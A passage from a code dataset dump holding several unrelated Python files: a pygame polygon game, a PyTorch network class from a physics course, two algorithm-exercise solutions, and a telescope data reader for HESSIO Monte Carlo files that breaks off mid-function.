{\t'black':\t(0,0,0),\n\t\t'white':\t(255,255,255),\n\t\t'red':\t\t(255,0,0),\n\t\t'green':\t(0,255,0),\n\t\t'blue':\t\t(0,0,255),\n\t\t'yellow':\t(255,255,0),\n\t\t'cyan':\t\t(0,255,255),\n\t\t'magenta':\t(255,0,255),\n\t\t'azure':\t(0,127,255),\n\t\t'violet':\t(127,0,255),\n\t\t'rose':\t\t(255,0,127),\n\t\t'orange':\t(255,127,0),\n\t\t'chartreuse':\t(127,255,0),\n\t\t'spring':\t(0,255,127)}\n\nprimaries = ['red','green','blue']\nsecondaries = ['yellow','cyan','magenta']\ntertiaries = ['azure','violet','rose','orange','chartreuse','spring']\n\nsaturated = tertiaries\n\nbw = ['black','white']\n\nallcols = bw + saturated\n\n# Draw a polygon:\ndef drawpoly(targetsurface,polyverts,incolor,bordercolor,border):\n\tpygame.draw.polygon(targetsurface,incolor,polyverts,0)\n\tif border != 0:\n\t\tpygame.draw.polygon(targetsurface,bordercolor,polyverts,border)\n\n# Generate ngon poly list:\ndef ngonlist(centerx,centery,n,radius,angle):\n\tif n < 3:\n\t\treturn []\n\tpolyverts = []\n\tfor i in range(n):\n\t\tfinangle = i * ((2 * math.pi) / n) + angle\n\t\thorizcomp = radius * math.cos(finangle)\n\t\tvertcomp = radius * math.sin(finangle)\n\t\tpolyverts.append( (centerx + horizcomp,centery + vertcomp) )\n\treturn polyverts\n\n# Draw an ngon:\ndef purengon(targetsurface,centerx,centery,n,radius,angle,incolor,bordercolor,border):\n\tif n < 3:\n\t\treturn\n\tpolyverts = ngonlist(centerx,centery,n,radius,angle)\n\tdrawpoly(targetsurface,polyverts,incolor,bordercolor,border)\n\n# Player:\n\ndefault_pangle = - math.pi / 2\n\ndefault_pspeed = 0.0\n\ndefault_pmaxspeed = 10.0\n\n\ndefault_paccelv = 0.2\n\ndefault_pdecelv = 0.3\n\ndefault_paccel = False\n\ndefault_pdecel = False\n\ndefault_pport = False\n\ndefault_pstarboard = False\n\ndefault_pangulaccel = 0.06\n\ndefault_px = 0.0\n\ndefault_py = 0.0\n\ndefault_pstate = 3\n\ndefault_pradius = 20\n\ndefault_pcolor = 2\n\ndef renderplayer(targetsurface):\n\tpolyverts = ngonlist(gamewidth//2,gameheight//2,pstate,pradius,pangle)\n\tpygame.draw.line(targetsurface,colors[saturated[pcolor]],polyverts[0],(polyverts[0][0] + 0.25*pradius*math.cos(pangle),polyverts[0][1] + 0.25*pradius*math.sin(pangle)),2)\n\tdrawpoly(targetsurface,polyverts,colors[saturated[pcolor]],colors['black'],2)\n\n# Enemy stuff:\n\nenemies = []\n\ndef gencoords(radius):\n\t# Generates a pair of coordinates with 95% probability of being within radius\n\tabsolute = 0\n\twhile abs(absolute) < 400:\n\t\tabsolute = random.gauss(0,radius/3)\n\tphase = random.uniform(-math.pi,math.pi)\n\txcoord = absolute * math.cos(phase) + px\n\tycoord = absolute * math.sin(phase) + py\n\treturn (xcoord,ycoord)\n\ndef genenemies(n,radius):\n\telist = []\n\tfor i in range(n):\n\t\tpos = gencoords(radius)\n\t\tsides = random.randint(3,5)\n\t\tcolnum = random.randint(0,len(saturated)-1)\n\t\teangle = random.uniform(-math.pi,math.pi)\n\t\telist.append((pos[0],pos[1],sides,colnum,eangle))\n\treturn elist\n\ndef renderenemy(targetsurface,enemy):\n\tex = int(enemy[0] + gamewidth//2 - px)\n\tey = int(enemy[1] + gameheight//2 + py)\n\tpverts = ngonlist(ex,ey,enemy[2],5,enemy[4])\n\trender = False\n\tfor pair in pverts:\n\t\tif pair[0] >= 0 and pair[0] < gamewidth and pair[1] >= 0 and pair[1] < gameheight:\n\t\t\trender = True\n\t\t\tbreak\n\tif not render:\n\t\treturn False\n\tdrawpoly(targetsurface,pverts,colors[saturated[enemy[3]]],colors['black'],1)\n\treturn True\n\n\n\ndef renderenemies(targetsurface):\n\tcount = 0\n\tfor e in enemies:\n\t\tif renderenemy(targetsurface,e):\n\t\t\tcount += 1\n\treturn count\n\ndef tickenemies(radius):\n\tglobal pradius\n\tfor i in range(len(enemies)):\n\t\te = enemies[i]\n\t\tex = e[0]\n\t\tey = e[1]\n\t\teangle = e[4]\n\t\tdists = (ex - px)**2 + (-ey - py)**2\n\t\tif dists <= pradius**2:\n\t\t\tnewc = gencoords(radius)\n\t\t\tif e[2] == pstate:\n\t\t\t\tif e[3] == pcolor:\n\t\t\t\t\tpradius += 1\n\t\t\t\t\tblip.play()\n\t\t\t\telse:\n\t\t\t\t\tnop.play()\n\t\t\telse:\n\t\t\t\tpradius -=1\n\t\t\t\touch.play()\n\t\t\tnewangle = random.uniform(-math.pi,math.pi)\n\t\t\tnewcol = random.randint(0,len(saturated)-1)\n\t\t\tnewsides = random.randint(3,5)\n\t\t\tenemies[i] = (newc[0],newc[1],newsides,newcol,newangle)\n\t\t\tcontinue\n\t\tif dists >= 1.2*radius**2:\n\t\t\tnewc = gencoords(radius)\n\t\t\tnewangle = random.uniform(-math.pi,math.pi)\n\t\t\tnewcol = random.randint(0,len(saturated)-1)\n\t\t\tnewsides = random.randint(3,5)\n\t\t\tenemies[i] = (newc[0],newc[1],newsides,newcol,newangle)\n\t\t\tcontinue\n\t\tex -= 0.5*math.cos(eangle)\n\t\tey += 0.5*math.sin(eangle)\n\t\topposite = -ey - py\n\t\tadjacent = ex - px\n\t\tanglett = math.atan2(opposite,adjacent)\n\t\tanglevel = 0.02\n\t\tif abs(eangle-anglett)>=2*anglevel:\n\t\t\tif eangle > 0 and anglett > 0:\n\t\t\t\tif eangle > anglett:\n\t\t\t\t\teangle -= anglevel\n\t\t\t\telse:\n\t\t\t\t\teangle += anglevel\n\t\t\telif eangle > 0 and anglett < 0:\n\t\t\t\tif anglett > eangle - math.pi:\n\t\t\t\t\teangle -= anglevel\n\t\t\t\telse:\n\t\t\t\t\teangle += anglevel\n\t\t\telif eangle < 0 and anglett < 0:\n\t\t\t\tif eangle < anglett:\n\t\t\t\t\teangle += anglevel\n\t\t\t\telse:\n\t\t\t\t\teangle -= anglevel\n\t\t\telse:\n\t\t\t\tif anglett < eangle + math.pi:\n\t\t\t\t\teangle += anglevel\n\t\t\t\telse:\n\t\t\t\t\teangle -= anglevel\n\t\tenemies[i] = (ex,ey,e[2],e[3],eangle)\n\n\t\t\t\n\n\t\t\n\n\n# Initializing pygame and opening a window:\n\nfullscreen = False\n\npygame.init()\n\npxwidth = 640\npxheight = 360\n\ngameDisp = pygame.display.set_mode((pxwidth,pxheight),pygame.RESIZABLE)\n\n# Setting up the game field:\n\ngamewidth = 640\ngameheight = 360\n\ngamefield = pygame.Surface((gamewidth,gameheight),0)\ngamefield.fill((255,255,255))\n\n# Title stuff\n\npygame.display.set_caption('polyAgonY')\ntitlepic_o = pygame.image.load(os.path.join('img','title.png'))\ntitlepic = pygame.Surface((gamewidth,gameheight),pygame.SRCALPHA,titlepic_o.get_bitsize(),titlepic_o.get_masks())\npygame.transform.scale(titlepic_o,(gamewidth,gameheight),titlepic)\ndel titlepic_o\nanykey_o = pygame.image.load(os.path.join('img','instructions.png'))\nanykey = pygame.Surface((gamewidth,gameheight),pygame.SRCALPHA,anykey_o.get_bitsize(),anykey_o.get_masks())\npygame.transform.scale(anykey_o,(gamewidth,gameheight),anykey)\ndel anykey_o\ngameover_o = pygame.image.load(os.path.join('img','gameover.png'))\ngameover = pygame.Surface((gamewidth,gameheight),pygame.SRCALPHA,gameover_o.get_bitsize(),gameover_o.get_masks())\npygame.transform.scale(gameover_o,(gamewidth,gameheight),gameover)\ndel gameover_o\nmovement_o = pygame.image.load(os.path.join('img','movement.png'))\nmovement = pygame.Surface((gamewidth,gameheight),pygame.SRCALPHA,movement_o.get_bitsize(),movement_o.get_masks())\npygame.transform.scale(movement_o,(gamewidth,gameheight),movement)\ndel movement_o\n\n# Sound Stuff\n\npygame.mixer.init()\n\nouch = pygame.mixer.Sound(os.path.join('snd','ouch.wav'))\nblip = pygame.mixer.Sound(os.path.join('snd','blip.wav'))\nnop = pygame.mixer.Sound(os.path.join('snd','nop.wav'))\n\n# Inverted stars, to perceive movement:\nstars = []\ndef genstar():\n\treturn (random.randint(-gamewidth//2,gamewidth//2) + px,random.randint(-gameheight//2,gameheight//2) - py,random.randint(0,128))\n\ndef genstars(num):\n\tslist = []\n\tfor i in range(num):\n\t\tslist.append(genstar())\n\treturn slist\n\ndef renderstar(targetsurface,star):\n\tpygame.gfxdraw.pixel(targetsurface,int(star[0] + gamewidth//2 - px),int(star[1] + gameheight//2 + py),(star[2],star[2],star[2]))\n\ndef renderstars(targetsurface):\n\tfor s in stars:\n\t\trenderstar(targetsurface,s)\n\ndef teststars():\n\tfor i in range(len(stars)):\n\t\ts = stars[i]\n\t\tsx = int(s[0] + gamewidth//2 - px)\n\t\tsy = int(s[1] + gameheight//2 + py)\n\t\tif sx < 0:\n\t\t\tstars[i] = (gamewidth//2 + px,random.randint(-gameheight//2,gameheight//2) - py,random.randint(0,128))\n\t\t\tcontinue\n\t\tif sx >= gamewidth:\n\t\t\tstars[i] = (-gamewidth//2 + px,random.randint(-gameheight//2,gameheight//2) - py,random.randint(0,128))\n\t\t\tcontinue\n\t\tif sy < 0:\n\t\t\tstars[i] = (random.randint(-gamewidth//2,gamewidth//2) + px,gameheight//2 - py,random.randint(0,128))\n\t\t\tcontinue\n\t\tif sy >= gameheight:\n\t\t\tstars[i] = (random.randint(-gamewidth//2,gamewidth//2) + px,-gameheight//2 - py,random.randint(0,128))\n\t\t\tcontinue\n\n\n# Setting up the timer for framerate limiting:\nclock = pygame.time.Clock()\n\n# Cycle condition:\nrunning = True\n\n# Game tick counter:\ntick = 0\n\n# Game state:\nstate = 0\n#\tStates:\n#\t0\tIntro\n#\t1\tGame\n#\t2\tPause\n#\t3\tOutro\n\n# Main loop:\nwhile running:\n\t# Event handling:\n\tfor each_event in pygame.event.get():\n\t\tif each_event.type == pygame.KEYDOWN:\n\t\t\tif each_event.key ==pygame.K_ESCAPE:\n\t\t\t\t# If you escape, you escape\n\t\t\t\trunning = False\n\t\t\t\tcontinue\n\t\t\telif each_event.key == pygame.K_F11:\n\t\t\t\t# Toggling fullscreen\n\t\t\t\tif fullscreen:\n\t\t\t\t\tfullscreen = False\n\t\t\t\t\tgameDisp = pygame.display.set_mode((oldw,oldh),pygame.RESIZABLE)\n\t\t\t\telse:\n\t\t\t\t\tfullscreen = True\n\t\t\t\t\toldw = pxwidth\n\t\t\t\t\toldh = pxheight\n\t\t\t\t\tmodes = pygame.display.list_modes()\n\t\t\t\t\tgameDisp = pygame.display.set_mode(modes[0],pygame.FULLSCREEN)\n\t\t\t\tdisps = pygame.display.get_surface()\n\t\t\t\tpxwidth,pxheight = disps.get_size()\n\t\t\t\tcontinue\n\t\t\tif state == 1:\n\t\t\t\t# Game\n\t\t\t\tif not (paccel or pdecel):\n\t\t\t\t\tif each_event.key == pygame.K_w:\n\t\t\t\t\t\tpaccel = True\n\t\t\t\t\telif each_event.key == pygame.K_s:\n\t\t\t\t\t\tpdecel = True\n\t\t\t\tif not (pport or pstarboard):\n\t\t\t\t\tif each_event.key == pygame.K_a:\n\t\t\t\t\t\tpport = True\n\t\t\t\t\telif each_event.key == pygame.K_d:\n\t\t\t\t\t\tpstarboard = True\n\t\t\t#elif state == 2:\n\t\t\t\t# Pause\n\t\t\t#else:\n\t\t\t\t# Outro\n\t\telif each_event.type == pygame.KEYUP:\n\t\t\tif each_event.key ==pygame.K_ESCAPE:\n\t\t\t\tcontinue\n\t\t\telif each_event.key == pygame.K_F11:\n\t\t\t\tcontinue\n\t\t\tif state == 0:\n\t\t\t\t# Intro\n\t\t\t\tstate = 1\n\t\t\t\ttick = 0\n\t\t\t\tpangle = default_pangle\n\t\t\t\tpspeed = default_pspeed\n\t\t\t\tpmaxspeed = default_pmaxspeed\n\t\t\t\tpaccelv = default_paccelv\n\t\t\t\tpdecelv = default_pdecelv\n\t\t\t\tpaccel = default_paccel\n\t\t\t\tpdecel = default_pdecel\n\t\t\t\tpport = default_pport\n\t\t\t\tpstarboard = default_pstarboard\n\t\t\t\tpangulaccel = default_pangulaccel\n\t\t\t\tpx = default_px\n\t\t\t\tpy = default_py\n\t\t\t\tpstate = default_pstate\n\t\t\t\tpradius = default_pradius\n\t\t\t\tpcolor = default_pcolor\n\t\t\t\tdel enemies\n\t\t\t\tenemies = genenemies(1000,10000)\n\t\t\t\tdel stars\n\t\t\t\tstars = genstars(256)\n\t\t\telif state == 1:\n\t\t\t\t# Game\n\t\t\t\tif each_event.key == pygame.K_w:\n\t\t\t\t\tpaccel = False\n\t\t\t\telif each_event.key == pygame.K_s:\n\t\t\t\t\tpdecel = False\n\t\t\t\telif each_event.key == pygame.K_a:\n\t\t\t\t\tpport = False\n\t\t\t\telif each_event.key == pygame.K_d:\n\t\t\t\t\tpstarboard = False\n\t\t\t\telif each_event.key == pygame.K_UP:\n\t\t\t\t\tpstate = ((pstate - 2) % 3) + 3\n\t\t\t\telif each_event.key == pygame.K_DOWN:\n\t\t\t\t\tpstate = ((pstate - 4) % 3) + 3\n\t\t\t\telif each_event.key == pygame.K_LEFT:\n\t\t\t\t\tpcolor = (pcolor - 1) % len(saturated)\n\t\t\t\telif each_event.key == pygame.K_RIGHT:\n\t\t\t\t\tpcolor = (pcolor + 1) % len(saturated)\n\t\t\t\telif each_event.key == pygame.K_SPACE:\n\t\t\t\t\tstate = 2\n\t\t\telif state == 2:\n\t\t\t\tif each_event.key == pygame.K_SPACE:\n\t\t\t\t\tstate = 1\n\t\t\t\tif each_event.key == pygame.K_r:\n\t\t\t\t\tstate = 0\n\t\t\telse:\n\t\t\t\t#Outro\n\t\t\t\tif each_event.key == pygame.K_SPACE or each_event.key == pygame.K_RETURN:\n\t\t\t\t\tstate = 0\n\t\telif each_event.type == pygame.QUIT:\n\t\t\t# If you wanna exit the window, we'll let'ya\n\t\t\trunning = False\n\t\telif each_event.type == pygame.VIDEORESIZE:\n\t\t\t# The window is resizeable. If it is, in fact, resized, it needs to be handled\n\t\t\tpxwidth = each_event.w\t# New width\n\t\t\tpxheight = each_event.h\t# New height\n\t\t\tif pxwidth < gamewidth:\n\t\t\t\tpxwidth = gamewidth\n\t\t\tif pxheight < gameheight:\n\t\t\t\tpxheight = gameheight\n\t\t\tgameDisp = pygame.display.set_mode((pxwidth,pxheight),pygame.RESIZABLE)\n\t\t\tdisps = pygame.display.get_surface()\n\t\n\t# Clear screen:\n\tif state < 2:\n\t\tgamefield.fill((255,255,255))\n\t\ttick = tick + 1\n\t\n\t# States:\n\tif state == 0:\n\t\t# Intro\n\t\t# Rotation rate - 30 = 1 RPS, 60 = 0.5 RPS, and so on\n\t\trrate = 240\n\t\tpurengon(gamefield,gameheight//2,gameheight//2,3 + ((tick//180)\n\t\t\t% 15),gameheight//3,((tick %\n\t\t\t\trrate)*math.pi*2)/rrate,colors[saturated[(tick//30)%\n\t\t\t\t\tlen(saturated)]],(0,0,0),1)\n\t\tgamefield.blit(titlepic,(0,0),None,0)\n\t\tif (tick // 30) % 2 == 1:\n\t\t\tgamefield.blit(anykey,(0,0),None,0)\n\n\telif state == 1:\n\t\t#Game\n\t\tteststars()\n\n\t\tnenemies = renderenemies(gamefield)\n\n\t\trenderstars(gamefield)\n\n\t\trenderplayer(gamefield)\n\t\tpx = px + pspeed * math.cos(pangle)\n\t\tpy = py - pspeed * math.sin(pangle)\n\t\tif paccel and not pdecel:\n\t\t\tpspeed = pspeed + paccelv\n\t\t\tif pspeed > pmaxspeed:\n\t\t\t\tpspeed = pmaxspeed\n\t\telif pdecel and not paccel:\n\t\t\tpspeed = pspeed - pdecelv\n\t\t\tif pspeed < 0:\n\t\t\t\tpspeed = 0\n\t\tif pport and not pstarboard:\n\t\t\tpangle -= pangulaccel\n\t\telif pstarboard and not pport:\n\t\t\tpangle += pangulaccel\n\t\twhile pangle > math.pi:\n\t\t\tpangle = pangle - 2*math.pi\n\t\twhile pangle < (-1)*math.pi:\n\t\t\tpangle = pangle + 2*math.pi\n\n\t\ttickenemies(10000)\n\n\t\tif pradius < 5 or pradius > gameheight//2:\n\t\t\tstate = 3\n\t\t\tgamefield.blit(gameover,(0,0),None,0)\n\t\t\tpygame.font.init()\n\t\t\tpixel = pygame.font.Font(os.path.join('txt','PIXEL___.TTF'),16)\n\t\t\tseconds = tick//30\n\t\t\tminutes = seconds//60\n\t\t\tseconds = seconds%60\n\t\t\tmessage = \"\"\n\t\t\tif minutes > 0:\n\t\t\t\tmessage = \"%s%d minutes, \"%(message,minutes)\n\t\t\tmessage = \"%s%d seconds\"%(message,seconds)\n\t\t\ttextsurf = pixel.render(message,False,colors['white'],colors['black'])\n\t\t\ttw = textsurf.get_width()\n\t\t\ttos = (gamewidth - tw)//2\n\t\t\tgamefield.blit(textsurf,(tos,32),None,0)\n\t\t\tdel message\n\t\t\tdel textsurf\n\t\t\tdel tw\n\t\t\tdel tos\n\t\t\tdel pixel\n\t\t\tpygame.font.quit()\n\n\t\tif tick < 90:\n\t\t\tgamefield.blit(movement,(0,0),None,0)\n\n\t#elif state == 2:\n\t\t#Pause\n\t#else:\n\t\t#Outro\n\t\n\n\n\t# Framerate limiting\n\tclock.tick(30)\n\t\n\t# Placing the game field on screen\n\tscale = min(int(pxwidth*1.0/(1.0*gamewidth)),int(pxheight*1.0/(1.0*gameheight)))\n\t\n\tscaledwidth = int(round(gamewidth*scale))\n\tscaledheight = int(round(gameheight*scale))\n\t\n\tdestination = pygame.Surface((scaledwidth,scaledheight),0)\n\t\n\tpygame.transform.scale(gamefield, (scaledwidth, scaledheight), destination)\n\t\n\txoffset = round((pxwidth - scaledwidth)*0.5)\n\tyoffset = round((pxheight - scaledheight)*0.5)\n\t\n\tgameDisp.blit(destination,(xoffset,yoffset),None,0)\n\t\n\t# Updating the window:\n\tpygame.display.update()\n\n# We got out of that vicious cycle, gotta get going:\npygame.quit()\nquit()\n","repo_name":"raffitz/LD35","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":13942,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"31"} +{"seq_id":"13251567356","text":"# ------------------------------------------------------------------------------\n#\n# Phys 490--Winter 2021 (P Ronagh)\n# Lecture 6--A Primer to ML R&D in PyTorch\n#\n# ------------------------------------------------------------------------------\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as func\nimport numpy as np\n\nclass Net(nn.Module):\n '''\n Neural network class.\n Architecture:\n Two fully-connected layers fc1 and fc2.\n Two nonlinear activation functions relu and sigmoid.\n '''\n\n def __init__(self, n_bits):\n super(Net, self).__init__()\n self.fc1= nn.Linear(n_bits, 100)\n self.fc2= nn.Linear(100, 100)\n self.fc3= nn.Linear(100, 100)\n self.fc4= nn.Linear(100, 5)\n\n # Feedforward function\n def forward(self, x):\n h1 = func.relu(self.fc1(x))\n h2 = func.relu(self.fc2(h1))\n h3 = func.relu(self.fc3(h2))\n y = torch.sigmoid(self.fc4(h3))\n return y\n\n # Reset function for the training weights\n # Use if the same network is trained multiple times.\n def reset(self):\n self.fc1.reset_parameters()\n self.fc2.reset_parameters()\n self.fc3.reset_parameters()\n self.fc4.reset_parameters()\n\n # Backpropagation function\n def backprop(self, data, loss, epoch, optimizer):\n self.train()\n inputs= torch.from_numpy(data.x_train)\n targets= torch.from_numpy(data.y_train)\n outputs= self(inputs)\n # An alternative to what you saw in the jupyter notebook is to\n # flatten the output tensor. This way both the targets and the model\n # outputs will become 1-dim tensors.\n obj_val= loss(self.forward(inputs), targets)\n optimizer.zero_grad()\n obj_val.backward()\n optimizer.step()\n return obj_val.item()\n\n def accuracy(self, data):\n accurate_train = 0\n accurate_test = 0\n with torch.no_grad():\n target_train = self.forward(torch.from_numpy(data.x_train))\n target_test = self.forward(torch.from_numpy(data.x_test))\n\n for i in range(len(data.y_train)):\n #print(target_train[i], data.y_train[i])\n if np.allclose(target_train.numpy()[i], data.y_train[i], atol = 1e-1): accurate_train += 1\n for i in range(len(data.y_test)):\n #print(target_train[i], y_train[i])\n if np.allclose(target_test.numpy()[i], data.y_test[i], atol = 1e-2): accurate_test += 1\n\n return accurate_train, accurate_test\n\n\n # Test function. Avoids calculation of gradients.\n def test(self, data, loss, epoch):\n self.eval()\n with torch.no_grad():\n inputs= torch.from_numpy(data.x_test)\n targets= torch.from_numpy(data.y_test)\n outputs= self(inputs)\n cross_val= loss(self.forward(inputs), targets)\n return cross_val.item()\n","repo_name":"shivi47/PHYS-490-Machine-Learning","sub_path":"HW2/src/nn_gen.py","file_name":"nn_gen.py","file_ext":"py","file_size_in_byte":2915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"43488359197","text":"class Solution:\n def dailyTemperatures(self, temperatures: List[int]) -> List[int]:\n stack, temp = [], temperatures\n for i in range(len(temp)):\n while stack and temp[i] > temp[stack[-1]]:\n j = stack.pop()\n temp[j] = i - j\n stack.append(i)\n for _ in range(len(stack)):\n temp[stack.pop()] = 0\n return temp\n","repo_name":"yosef212321/LeetCode_Problems","sub_path":"Daily_Temperatures/Daily Temperatures.py","file_name":"Daily Temperatures.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27704595728","text":"# normal count strategy\n\ndef countk(s,k):\n n = len(s)\n res=0\n for i in range(0,n):\n dist_count=0\n map={i:0 for i in 'abcdefghijklmnopqrstuvwxyz'}\n\n for j in range(i,n):\n\n if map[s[j]]==0:\n dist_count+=1\n\n map[s[j]]+=1\n\n if dist_count==k:\n res+=1\n if dist_count>k:\n break\n\n return res\n\nprint(countk('pqpqs',2))","repo_name":"BJV-git/Data_structures_and_Algorithms","sub_path":"Data_structures_and_Algorithms/strings/count_k_distinct_sub.py","file_name":"count_k_distinct_sub.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"12915866205","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\n\"\"\"\nComponents to read HESSIO data.\n\nThis requires the hessio python library to be installed\n\"\"\"\nimport logging\nimport numpy as np\nfrom tqdm import tqdm\n\nfrom astropy import units as u\nfrom astropy.coordinates import Angle\nfrom astropy.time import Time\nfrom ctapipe.core import Provenance\nfrom ctapipe.instrument import TelescopeDescription, SubarrayDescription\n\nfrom digicampipe.instrument.camera import DigiCam\nfrom digicampipe.io.containers import DataContainer\n\n\nlogger = logging.getLogger(__name__)\n\ntry:\n from pyhessio import open_hessio\n from pyhessio import HessioError\n from pyhessio import HessioTelescopeIndexError\n from pyhessio import HessioGeneralError\nexcept ImportError as err:\n logger.fatal(\n \"the `pyhessio` python module is \"\n \"required to access MC data: {}\".format(err))\n raise err\n\n__all__ = [\n 'hessio_event_source',\n]\n\n\ndef hessio_get_list_event_ids(url, max_events=None):\n \"\"\"\n Faster method to get a list of all the event ids in the hessio file.\n This list can also be used to find out the number of events that exist\n in the file.\n\n Parameters\n ----------\n url : str\n path to file to open\n max_events : int, optional\n maximum number of events to read\n\n Returns\n -------\n event_id_list : list[num_events]\n A list with all the event ids that are in the file.\n\n \"\"\"\n logger.warning(\"This method is slow. Need to find faster method.\")\n try:\n with open_hessio(url) as pyhessio_file:\n Provenance().add_input_file(url, role='r0.sub.evt')\n counter = 0\n event_id_list = []\n eventstream = pyhessio_file.move_to_next_event()\n for event_id in eventstream:\n event_id_list.append(event_id)\n counter += 1\n if max_events and counter >= max_events:\n pyhessio_file.close_file()\n break\n return event_id_list\n except HessioError:\n raise RuntimeError(\"hessio_event_source failed to open '{}'\"\n .format(url))\n\n\ndef hessio_event_source(url, camera=DigiCam, max_events=None,\n allowed_tels=None, requested_event=None,\n use_event_id=False, event_id=None, disable_bar=False):\n \"\"\"A generator that streams data from an EventIO/HESSIO MC data file\n (e.g. a standard CTA data file.)\n\n Parameters\n ----------\n url : str\n path to file to open\n max_events : int, optional\n maximum number of events to read\n allowed_tels : list[int]\n select only a subset of telescope, if None, all are read. This can\n be used for example emulate the final CTA data format, where there\n would be 1 telescope per file (whereas in current monte-carlo,\n they are all interleaved into one file)\n requested_event : int\n Seek to a paricular event index\n use_event_id : bool\n If True ,'requested_event' now seeks for a particular event id instead\n of index\n disable_bar : Unused, for compatibility with other readers\n \"\"\"\n\n if event_id is not None:\n\n raise ValueError('Event id feature not implemented yet! \\n'\n 'Use event_id=None')\n\n with open_hessio(url) as pyhessio_file:\n\n # the container is initialized once, and data is replaced within\n # it after each yield\n Provenance().add_input_file(url, role='dl0.sub.evt')\n counter = 0\n\n eventstream = pyhessio_file.move_to_next_event()\n if allowed_tels is not None:\n allowed_tels = set(allowed_tels)\n data = DataContainer()\n data.meta['origin'] = \"hessio\"\n\n # some hessio_event_source specific parameters\n data.meta['input'] = url\n data.meta['max_events'] = max_events\n\n for event_id in tqdm(eventstream, disable=disable_bar):\n\n # Seek to requested event\n if requested_event is not None:\n current = counter\n if use_event_id:\n current = event_id\n if not current == requested_event:\n counter += 1\n continue\n\n data.r0.run_id = pyhessio_file.get_run_number()\n data.r0.event_id = event_id\n data.r0.tels_with_data = list(pyhessio_file.get_teldata_list())\n\n data.r1.run_id = pyhessio_file.get_run_number()\n data.r1.event_id = event_id\n data.r1.tels_with_data = list(pyhessio_file.get_teldata_list())\n data.dl0.run_id = pyhessio_file.get_run_number()\n data.dl0.event_id = event_id\n data.dl0.tels_with_data = list(pyhessio_file.get_teldata_list())\n\n # handle telescope filtering by taking the intersection of\n # tels_with_data and allowed_tels\n if allowed_tels is not None:\n selected = data.r0.tels_with_data & allowed_tels\n if len(selected) == 0:\n continue # skip event\n data.r0.tels_with_data = selected\n data.r1.tels_with_data = selected\n data.dl0.tels_with_data = selected\n\n data.trig.tels_with_trigger \\\n = pyhessio_file.get_central_event_teltrg_list()\n time_s, time_ns = pyhessio_file.get_central_event_gps_time()\n data.trig.gps_time = Time(time_s * u.s, time_ns * u.ns,\n format='unix', scale='utc')\n data.mc.energy = pyhessio_file.get_mc_shower_energy() * u.TeV\n data.mc.alt = Angle(pyhessio_file.get_mc_shower_altitude(), u.rad)\n data.mc.az = Angle(pyhessio_file.get_mc_shower_azimuth(), u.rad)\n data.mc.core_x = pyhessio_file.get_mc_event_xcore() * u.m\n data.mc.core_y = pyhessio_file.get_mc_event_ycore() * u.m\n first_int = pyhessio_file.get_mc_shower_h_first_int() * u.m\n data.mc.h_first_int = first_int\n\n # mc run header data\n data.mcheader.run_array_direction = \\\n pyhessio_file.get_mc_run_array_direction()\n\n data.count = counter\n\n # this should be done in a nicer way to not re-allocate the\n # data each time (right now it's just deleted and garbage\n # collected)\n\n data.r0.tel.clear()\n data.r1.tel.clear()\n data.dl0.tel.clear()\n data.dl1.tel.clear()\n data.mc.tel.clear() # clear the previous telescopes\n\n _fill_instrument_info(data, pyhessio_file, camera.geometry, camera)\n\n for tel_id in data.r0.tels_with_data:\n\n data.mc.mc_event_offset_fov = \\\n pyhessio_file.get_mc_event_offset_fov()\n\n data.mc.tel[tel_id].dc_to_pe \\\n = pyhessio_file.get_calibration(tel_id)\n data.mc.tel[tel_id].pedestal \\\n = pyhessio_file.get_pedestal(tel_id)\n\n data.r0.tel[tel_id].camera_event_number = event_id\n\n data.r0.tel[tel_id].adc_samples = \\\n pyhessio_file.get_adc_sample(tel_id)\n\n data.r0.tel[tel_id].adc_samples = \\\n data.r0.tel[tel_id].adc_samples[0]\n data.r0.tel[tel_id].local_camera_clock = 0\n\n if data.r0.tel[tel_id].adc_samples.size == 0:\n # To handle ASTRI and dst files\n data.r0.tel[tel_id].adc_samples = \\\n pyhessio_file.get_adc_sum(tel_id)[..., None]\n data.r0.tel[tel_id].adc_sums = \\\n pyhessio_file.get_adc_sum(tel_id)\n\n try:\n\n data.mc.tel[tel_id].reference_pulse_shape = \\\n pyhessio_file.get_ref_shapes(tel_id)\n\n except HessioGeneralError:\n\n pass\n\n nsamples = pyhessio_file.get_event_num_samples(tel_id)\n if nsamples <= 0:\n nsamples = 1\n data.r0.tel[tel_id].num_samples = nsamples\n\n # load the data per telescope/pixel\n hessio_mc_npe = pyhessio_file.get_mc_number_photon_electron\n data.mc.tel[tel_id].photo_electron_image \\\n = hessio_mc_npe(telescope_id=tel_id)\n data.mc.tel[tel_id].meta['refstep'] = \\\n pyhessio_file.get_ref_step(tel_id)\n data.mc.tel[tel_id].time_slice = \\\n pyhessio_file.get_time_slice(tel_id)\n data.mc.tel[tel_id].azimuth_raw = \\\n pyhessio_file.get_azimuth_raw(tel_id)\n data.mc.tel[tel_id].altitude_raw = \\\n pyhessio_file.get_altitude_raw(tel_id)\n data.mc.tel[tel_id].azimuth_cor = \\\n pyhessio_file.get_azimuth_cor(tel_id)\n data.mc.tel[tel_id].altitude_cor = \\\n pyhessio_file.get_altitude_cor(tel_id)\n pedestal = data.mc.tel[tel_id].pedestal\n baseline = pedestal / data.r0.tel[tel_id].adc_samples.shape[1]\n data.r0.tel[tel_id].digicam_baseline = np.squeeze(baseline)\n\n yield data\n counter += 1\n\n if max_events and counter >= max_events:\n pyhessio_file.close_file()\n return\n\n\ndef _fill_instrument_info(data, pyhessio_file, camera_geometry, camera):\n \"\"\"\n fill the data.inst structure with instrumental information.\n\n Parameters\n ----------\n data: DataContainer\n data container to fill in\n\n \"\"\"\n if not data.inst.telescope_ids:\n data.inst.telescope_ids = list(pyhessio_file.get_telescope_ids())\n data.inst.subarray = SubarrayDescription(\"MonteCarloArray\")\n\n for tel_id in data.inst.telescope_ids:\n try:\n\n pix_pos = pyhessio_file.get_pixel_position(tel_id) * u.m\n foclen = pyhessio_file.get_optical_foclen(tel_id) * u.m\n mirror_area = 